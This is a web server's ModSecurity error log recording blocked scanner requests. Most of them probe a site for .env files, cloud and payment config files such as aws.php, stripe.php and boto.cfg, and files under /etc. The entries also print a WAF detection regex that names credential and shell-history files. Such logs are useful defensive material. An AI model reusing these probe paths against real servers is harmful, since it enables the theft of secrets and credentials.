[Tue May 26 15:25:05.512572 2026] [security2:error] [pid 707292:tid 707374] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backup/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6wgAAqVE"]
[Tue May 26 15:25:05.513209 2026] [security2:error] [pid 707292:tid 707338] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/beta/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6wwAAqS0"]
[Tue May 26 15:25:05.657046 2026] [security2:error] [pid 707292:tid 707373] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/client/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6zAABAlA"]
[Tue May 26 15:25:05.658571 2026] [security2:error] [pid 707292:tid 707470] [client 172.202.92.73:46154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/wp-content/admin.php"] [unique_id "ahVt-dKAqlRPSIEFAut60QAAALU"]
[Tue May 26 15:25:05.658668 2026] [security2:error] [pid 707292:tid 707470] [client 172.202.92.73:46154] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/wp-content/admin.php"] [unique_id "ahVt-dKAqlRPSIEFAut60QAAALU"]
[Tue May 26 15:25:05.659105 2026] [security2:error] [pid 707292:tid 707356] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/cms/.env"] [unique_id "ahVt-dKAqlRPSIEFAut6zwABAj8"]
[Tue May 26 15:25:05.659448 2026] [security2:error] [pid 707292:tid 707368] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config.php"] [unique_id "ahVt-dKAqlRPSIEFAut61gABAks"]
[Tue May 26 15:25:05.803068 2026] [security2:error] [pid 707292:tid 707365] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/.env"] [unique_id "ahVt-dKAqlRPSIEFAut63wAAokg"]
[Tue May 26 15:25:05.804529 2026] [security2:error] [pid 707292:tid 707385] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/aws.php"] [unique_id "ahVt-dKAqlRPSIEFAut65AAAolw"]
[Tue May 26 15:25:05.805789 2026] [security2:error] [pid 707292:tid 707384] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/config.inc.php"] [unique_id "ahVt-dKAqlRPSIEFAut65gAAols"]
[Tue May 26 15:25:05.807553 2026] [security2:error] [pid 707292:tid 707408] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/config.php"] [unique_id "ahVt-dKAqlRPSIEFAut66gAAonM"]
[Tue May 26 15:25:05.948566 2026] [security2:error] [pid 707292:tid 707405] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/env.php"] [unique_id "ahVt-dKAqlRPSIEFAut69gABAXA"]
[Tue May 26 15:25:05.951188 2026] [security2:error] [pid 707292:tid 707378] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/module.config.php"] [unique_id "ahVt-dKAqlRPSIEFAut6-QABAVU"]
[Tue May 26 15:25:05.951661 2026] [security2:error] [pid 707292:tid 707399] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/nexmo.php"] [unique_id "ahVt-dKAqlRPSIEFAut6-wABAWo"]
[Tue May 26 15:25:05.952749 2026] [security2:error] [pid 707292:tid 707406] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/stripe.php"] [unique_id "ahVt-dKAqlRPSIEFAut6_wABAXE"]
[Tue May 26 15:25:06.207216 2026] [security2:error] [pid 707292:tid 707323] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/crm/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7GwAAvh4"]
[Tue May 26 15:25:06.207493 2026] [security2:error] [pid 707292:tid 707327] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/cron/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7HAAAviI"]
[Tue May 26 15:25:06.243170 2026] [security2:error] [pid 707292:tid 707304] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/current/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7HQAA0As"]
[Tue May 26 15:25:06.244166 2026] [security2:error] [pid 707292:tid 707330] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/demo/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7HwAA0CU"]
[Tue May 26 15:25:06.246766 2026] [security2:error] [pid 707292:tid 707309] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/dev/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7IQAArhA"]
[Tue May 26 15:25:06.247023 2026] [security2:error] [pid 707292:tid 707313] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/developer/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7JAAArhQ"]
[Tue May 26 15:25:06.247659 2026] [security2:error] [pid 707292:tid 707316] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/development/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7JQAArhc"]
[Tue May 26 15:25:06.248302 2026] [security2:error] [pid 707292:tid 707321] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/develop/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7IwAArhw"]
[Tue May 26 15:25:06.248958 2026] [cgid:error] [pid 707292:tid 707332] [remote 195.178.110.199:59060] AH01264: stderr from /home2/onesomzc/public_html/www.sevenstar.onesoft.in/dnscfg.cgi: script not found or unable to stat
[Tue May 26 15:25:06.395043 2026] [security2:error] [pid 707292:tid 707317] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/erp/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7NgAAhRg"]
[Tue May 26 15:25:06.397191 2026] [security2:error] [pid 707292:tid 707308] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVt-tKAqlRPSIEFAut7OAAAhQ8"]
[Tue May 26 15:25:06.451193 2026] [security2:error] [pid 707292:tid 707335] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/etc/boto.cfg"] [unique_id "ahVt-tKAqlRPSIEFAut7PAAA4io"]
[Tue May 26 15:25:06.480071 2026] [security2:error] [pid 707292:tid 707549] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt-tKAqlRPSIEFAut7CAAAAQQ"]
[Tue May 26 15:25:06.500007 2026] [security2:error] [pid 707292:tid 707334] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/fe/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7QAAApik"]
[Tue May 26 15:25:06.536849 2026] [security2:error] [pid 707292:tid 707342] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/front/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7SAAA4TE"]
[Tue May 26 15:25:06.540305 2026] [security2:error] [pid 707292:tid 707344] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/frontend/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7SQAAujM"]
[Tue May 26 15:25:06.542538 2026] [security2:error] [pid 707292:tid 707341] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/info.php"] [unique_id "ahVt-tKAqlRPSIEFAut7UQAAujA"]
[Tue May 26 15:25:06.596241 2026] [security2:error] [pid 707292:tid 707361] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/infophp.php"] [unique_id "ahVt-tKAqlRPSIEFAut7WAAAl0Q"]
[Tue May 26 15:25:06.646281 2026] [security2:error] [pid 707292:tid 707358] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/infos.php"] [unique_id "ahVt-tKAqlRPSIEFAut7WQAA5EE"]
[Tue May 26 15:25:06.682897 2026] [security2:error] [pid 707292:tid 707359] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/laravel/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7XAAAh0I"]
[Tue May 26 15:25:06.683386 2026] [security2:error] [pid 707292:tid 707338] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/lms/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7XQAAhy0"]
[Tue May 26 15:25:06.685437 2026] [security2:error] [pid 707292:tid 707349] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/local/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7XwAAhzg"]
[Tue May 26 15:25:06.686833 2026] [security2:error] [pid 707292:tid 707347] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/marketing/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7ZAAAhzY"]
[Tue May 26 15:25:06.686920 2026] [security2:error] [pid 707292:tid 707362] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/market/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7YwAAh0U"]
[Tue May 26 15:25:06.689966 2026] [security2:error] [pid 707292:tid 707371] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/media/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7ZwAAh04"]
[Tue May 26 15:25:06.796923 2026] [security2:error] [pid 707292:tid 707368] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/new/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7bQAAqks"]
[Tue May 26 15:25:06.797357 2026] [security2:error] [pid 707292:tid 707377] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node-api/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7bgAAqlQ"]
[Tue May 26 15:25:06.828212 2026] [security2:error] [pid 707292:tid 707370] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/node/.env"] [unique_id "ahVt-tKAqlRPSIEFAut7bwAAtE0"]
